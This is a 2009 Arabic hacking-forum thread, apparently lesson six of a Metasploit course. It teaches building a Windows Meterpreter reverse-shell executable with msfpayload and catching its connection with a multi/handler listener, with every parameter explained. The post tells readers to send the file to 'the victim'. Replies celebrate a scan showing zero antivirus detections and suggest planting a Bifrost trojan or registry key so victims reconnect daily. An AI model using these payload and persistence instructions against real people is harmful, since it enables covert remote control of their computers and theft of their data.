التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-30-2009, 08:10 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي [الدرس السادس] صناعة بايلود Meterpreter


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة

مدري طولت عليم بالدرس السادس لكن ظروف وامتحانات ... الله بعين .... الحمد لله وشكر لله
درسنا اليوم يكون عن صناعة بايلود اسمه Meterpreter وانا اعتبره من اقوى وافضل البايلود من بين البايلودات الاخرى والاغلب يعتبره قوية لانه قوية :D
ما قوي الا الله

يستعمل هذا البايلود بعد صناعته بأمتداد exe او pl في التحكم بجهاز الضحية ببعض الاوامر الذي يكون الامر يحل محل امر قوي كأمر زرع ريجستري ..واو ... وامر رفع ملف لجهاز الضحية وتشغيله وسحب ملف و و و

ان شاء الله بهل الاكمن يوم ادرجها لكم ...
الدرس فيديو لكن شرحته كتابي وبأمكانك ايضا تحميله يعني فيديو + كتابي لأصحاب النت الضعيفة

نبدأ الدرس
ملاحظة: هنا سنستخدم CMd shell في الميتاسبلويت وليس msfweb يعني ليس الرابط الذي تشعه بالمتصفح 127.0.0.1:55555
اول شيء نفتحه عن طريق ابدأ >> البرامج >>> Metasploit 3 >>> الكومند شيل CMD shell
نبدأ الدرس بأول امر وهو

كود PHP:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 X >"C:\"vbspiders.exe 
الكود اول مرة تشوفونه للذين يتعلمون الميتا جديدا

هناك شروحات عن صناعة هذا ويشبه الشرح لكن هناك تطبيق دون فهم اي شيء منها يعني فيك تقول الفيديوهات عن هذه البايلود منقول لكن يختلف مقدم الفيديو .. انا وضعته لكي لا حد يتسائل
الآن الشرح الفيديو لي انا

مش هذا موضوعنا نبدأ بالشرح

ruby : كلمة تبدأ بها في اي شيء تستخدمه عن طريق CMD shell يكون بدايته ruby هذا ما نختلف عليه سواء كنت تستخدم msfcli سوف تكتب اول كلمة وهي ruby

msfpayload : تستخدم في في اسخدام بايلود نحن في هذه الحالة نستخدم صناعة بايلود وليس استخدام ثغرة .ز لو كان ثغرة كا وضعنا msfcli وجزء msf هو اساسي تضعه في البداية وبعدها النوع

windows/meterpreter/reverse_tcp : وهي اسم بايلود الميتر بريتر يعني ... نيجي لآخر مقطع reverse_tcp تستخدم في الاتصال العكسي مفيد في تخطي الجدار الناري وبأمكانكم وضع bind_tcp اذا كنت متأكد من البورت مفتوح .. لكن يفضل وضع اتصال عكسي ..... مش واحد ييجي ويقول بدي اضع الاثنين .. لكي اذا لم يزبط اتصال عكسي يجرب تلقائئي اتصال مباشر ويكون امره bind_tcp+reverse_tcp خخخخ <<< خخخ هذا غلط يا اخوان اما عكسي او مباشر ... واسم البايلود موجود بلميتا عن طريق وضع امر show payloads بتحصل هذه البايلود

LHOST : الكل يعرفها اذا تابع دروسي من اولها وهي لأختيار اي بي جهازك الذي تريد وصول التبليغ عليه يعني بأختصار تضع اي بي جهازك المحلي
LPORT : البورت الذي تريد استخدامه في الثغرة ويلزم يكون مفتوح بالراوتر

X : لصناعة البايلود بأمتداد exe اي تنفيذي وان شئت بأمكانك وضع P بدل X فيصنع البايلود بأمتداد بيرل لكن يلزم تعدل على الامتددا بوضع meter.pl

> : تستخدم لتشير الى وضعه بالمسار كذا يعني يتبعها المسار

"C:\"vbspiders.exe : هذا هو المسار لكن يحصر المسار بين علامتي تنصيص " وبعدها تكتب الاسم وبأمكانك وضع اي اسم تريد ولا يشترط هذا الاسم فقط
الآن نضغط انتر وننتظر الصناعة ورح يتم صناعتة بالمسار C وبحجم 9.50 كيلو بايت

الآن نريد نتصنت عليها بثغة تصنت بالميتا ويكون الامر هكذا

كود PHP:
ruby msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 E 
نشرح الامر
اول شيء
ruby : شرحناه فوق
msfcli : لأستخدام ثغرة << في هذه المر ثغرة وليس بايلود فنستخدم بالثغرات msfcli

بعدها يتبعها اسم الثغرة التصنت وهي multi/handler هي بالحقيقة لا تعتبر بأس ثغرة وانما بأسم اداة كالنت كات لكن هذه مخصصة فقط للتصنت على ثغرات الميت فقط

PAYLOAD= : وضع اسم البايلود التي نريد استخدامه يجب وضع اسم البايلود الذي نريد استخدامه حسب الذي تم صناعته من قبلك

يعني الامر كما هو موضح

PAYLOAD=windows/meterpreter/reverse_tcp

الخلاصة انك تضع اسم البايلود الذي تريد التصنت عليه

LHOST=192.168.1.1 : الاي بي الذي وضعناه في اعدادات صناعة البايلود وانت استبدله بأي بي ججهازك المحلي

LPORT=9999 : البورت الذي وضعناه في اعدادات الثغرة واستبدله بالبورت الذي تريد على حسب ما تم وضعه في ثغرتك

ولا تسوا حرف E لانه لن يتم عمل الثغرة الا بعد وضع هذا الحرف

الآن نضغط انتر وننتظر

الآن هيك تم الصناعة والتصنت يبقى ارسالة للضحية بأي طريقة تريدها ...
جربه على نفسك لكي تعتاد عليه

موفقين شباب
الى الامام بعون الله


هذا رابط الفيديو واشوفه اشمل وافضل من الكتابة لأنكم اول مرة للي يمرون عليه
Download
اي استفسار او شيء اناا جاهز

#####
تحياتي
لا للاحتكار
المجهوول


Fhg]vs hgsh]sD wkhum fhdg,] Meterpreter


التعديل الأخير تم بواسطة المجهووول ; 10-03-2009 الساعة 02:20 PM.

   

رد مع اقتباس
قديم 09-30-2009, 09:19 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


يا كبير والله خيرك كثير



ابداعك ملموس يا ورده

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 09-30-2009, 10:07 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
MrXRoMaNcE1
VBSPIDERS TEAM
 
الصورة الرمزية MrXRoMaNcE1
 

 

 
إحصائية العضو






MrXRoMaNcE1 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
MrXRoMaNcE1 is on a distinguished road

افتراضي


يعطيك العافية درس جميل
بانتظار جديدك

التوقيع

 

   

رد مع اقتباس
قديم 10-01-2009, 01:52 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو







ابو بدر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
ابو بدر is on a distinguished road

افتراضي


مشكووور اخوي المجهووول
واصل ابدااعك واتمنى انه ما يكون اخر درس
بأنتظار الدرس القادم


التعديل الأخير تم بواسطة ابو بدر ; 10-01-2009 الساعة 02:14 AM.

   

رد مع اقتباس
قديم 10-02-2009, 08:52 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


File Info

Report generated: 2.10.2009 at 19.19.17 (GMT 1)
Filename: meterpreter.rar
File size: 26 KB
MD5 Hash: c9fc624ab913aef3c7e323db9ff59af0
SHA1 Hash: B75FDB48C8972E574D18D235E923807B93733B61
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 23

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



cleeeeeeeeeeeeeeeeeeeeeeeeen

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 10-28-2009, 08:31 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


تسسسلم حبيبي وأنشاء الله راح أستمر بمواضيعك الجميله لاني كونت أتجول بمحرك البحث ][ قوقل ][

فوجدت هذا الموضوع وأجبرت أن أسجل في منتداكم لاني أحب الاختراق المستهدف وأنا لم أجربها بحياتي وأريد أنا أجرب طريقتك

وبإذن الله تنجح

شكرآ لك ..


التعديل الأخير تم بواسطة Dr.NaNo ; 10-28-2009 الساعة 08:34 PM.

   

رد مع اقتباس
قديم 10-30-2009, 10:50 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Lo$er.0
 

 

 
إحصائية العضو





Lo$er.0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Lo$er.0 is on a distinguished road

افتراضي


جميل الفديو فهمت اكثر وياريت لو اعدت صناعة كل الدروس فديو حتي تكون الدوره اكثر فهم بارك الله فيك
والى فهمته انك تقريبا بتصنع حاجه شبيها بالباتش عند فتحها يصل التبليغ

ارجوا ان توضح اذا كان فهمي خاطء


التعديل الأخير تم بواسطة Lo$er.0 ; 10-30-2009 الساعة 10:58 AM.

   

رد مع اقتباس
قديم 10-30-2009, 12:03 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية gr-group
 

 

 
إحصائية العضو





gr-group غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gr-group is on a distinguished road

افتراضي


انا من عشاق الميتا سبلويت
ولم اجد درس اسهل في شرحه اكتر من دروسك

موفق انشالله

   

رد مع اقتباس
قديم 11-01-2009, 07:28 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية gr-group
 

 

 
إحصائية العضو





gr-group غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
gr-group is on a distinguished road

افتراضي


طيب انا عملت البايلود والتبليغ فعلا شغال طيارة ( زي ما بيقولوا ) لكن المشكله ان التبليغ علي الايبي ... وطبعا الايبي بيتغير حتي لما بجيب الايبي من موقع cmyip او اي موقع تاني فا الايبي دا بردو مش ثابت
ولما عملته علي هوست للنو ايبي مشتغلش ... هل في طريقة يوصلني بها التبليغ ؟؟؟؟؟؟؟
ولا اشتغل شبكات محلية بس ؟

   

رد مع اقتباس
قديم 11-13-2009, 03:23 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


ملك ملك ملك

على رااسي يا كبييييييير

راائع انت حتى النخااع


يعني كيف اوصف شعووري لما شوفت شرحك ما بعرف

تخيل يا مجهوول

انا نزلت اليونكس على جهاازي بس عشان شوفت شرح وااحد من الاخوان على الانترنت و كان الشرح صناااعه بايلوود ... لكن كان على اليونكس ×_×

و رحت اجرب على الويندوز ما عرفت

قلت يا شيخ نزلها

نزلتها من النت و حرقتها على قرص و ثبتت و كلالالالالام كثثيرر

و الحمد لله زبطت معاي على اليونكس

لكن المجهوول الراائع و شرحي ايها بالصوور


بحق انت رااائع

وااااااصل يا مبدع

و اذا شااق عليك اي حاجه و ما قدرت تكمل الدرووس ممكن اساعدك فيها لو تريد ^^

في خدمتك

لا للاحتكاار

التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 

   

رد مع اقتباس
قديم 11-13-2009, 03:29 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


اقتباس
طيب انا عملت البايلود والتبليغ فعلا شغال طيارة ( زي ما بيقولوا ) لكن المشكله ان التبليغ علي الايبي ... وطبعا الايبي بيتغير حتي لما بجيب الايبي من موقع cmyip او اي موقع تاني فا الايبي دا بردو مش ثابت
ولما عملته علي هوست للنو ايبي مشتغلش ... هل في طريقة يوصلني بها التبليغ ؟؟؟؟؟؟؟
ولا اشتغل شبكات محلية بس ؟

تستخدم حبيبي DSL و لا دايل اب

و انت استخدمت في صناعه البايلود اي بي الـمودم و لا اي بي اللي جاك على كومي اي بي

وضح اكثر ^^
التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 

   

رد مع اقتباس
قديم 11-13-2009, 04:32 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


الميتاسبلويت مباشرة الاختراق
يعني تخترق الواحد وبعد ما يتغير الاي بلي اكيد مش رح يتم الاتصال كمان مرة لذا الميتا اعطتك خيارات كثار بامكانك رفع سيرفر بيفروست وتشغيله عن طريقها
ويوجد هناك اظن مش متذكر منيح لاني تركتها اكمن فترة لكن بتذكر انه يوجد خيار زرع مفتاح ريجستر يعني اذا انت بتعرف بهذه الدواوين بتخترع لك شيء يخلي الضحية كل يوم يتصل بك
##
تحياتي
لاا للاحتكار
المجهوول

   

رد مع اقتباس
قديم 12-08-2009, 02:37 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية PROF
 

 

 
إحصائية العضو







PROF غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى PROF

 

 

إحصائية الترشيح

عدد النقاط : 10
PROF is on a distinguished road

افتراضي


مبدع والله
تسلم يمينك يا بطل

التوقيع

EgYpT@ My BlOoD


 

   

رد مع اقتباس
قديم 12-15-2009, 11:27 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية micheal
 

 

 
إحصائية العضو





micheal غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
micheal is on a distinguished road

افتراضي


اخواني ممكن سوال وين القي cmd shell لاني دورت عليه وما لقيته

   

رد مع اقتباس
قديم 01-03-2010, 09:08 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
Hαcĸer'ѕ Kιɴɢ
:: Interactive Developer ::
 
الصورة الرمزية Hαcĸer'ѕ Kιɴɢ
 

 

 
إحصائية العضو








Hαcĸer'ѕ Kιɴɢ غير متواجد حالياً

إرسال رسالة عبر MSN إلى Hαcĸer'ѕ Kιɴɢ

 

 

إحصائية الترشيح

عدد النقاط : 10
Hαcĸer'ѕ Kιɴɢ is on a distinguished road

افتراضي


thanks man very nice

التوقيع

** إن مرت الايام ولم تروني فهذه مشاركاتي فـتذكروني

وان غبت ولم تجدوني اكون وقتها بحاجه للدعاء فادعولي **

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[الدرس السابع] صناعة بايلود الـ reflectivedllinject المجهووول MetaSploit 15 03-10-2018 08:16 PM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 2 : screenshot/keylogging data$hack MetaSploit 100 02-03-2011 05:42 AM
[الدرس الثامن] صناعة بايلود vncinject المجهووول MetaSploit 12 11-26-2010 08:02 PM
python:payloadgen صناعة بايلود المجهووول Tools forum 6 09-18-2010 07:28 PM
module 4 : ال [METERPRETER]. =>>>>>> الدرس 4 : Metsvc data$hack MetaSploit 40 07-22-2010 11:20 AM


الساعة الآن 10:44 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0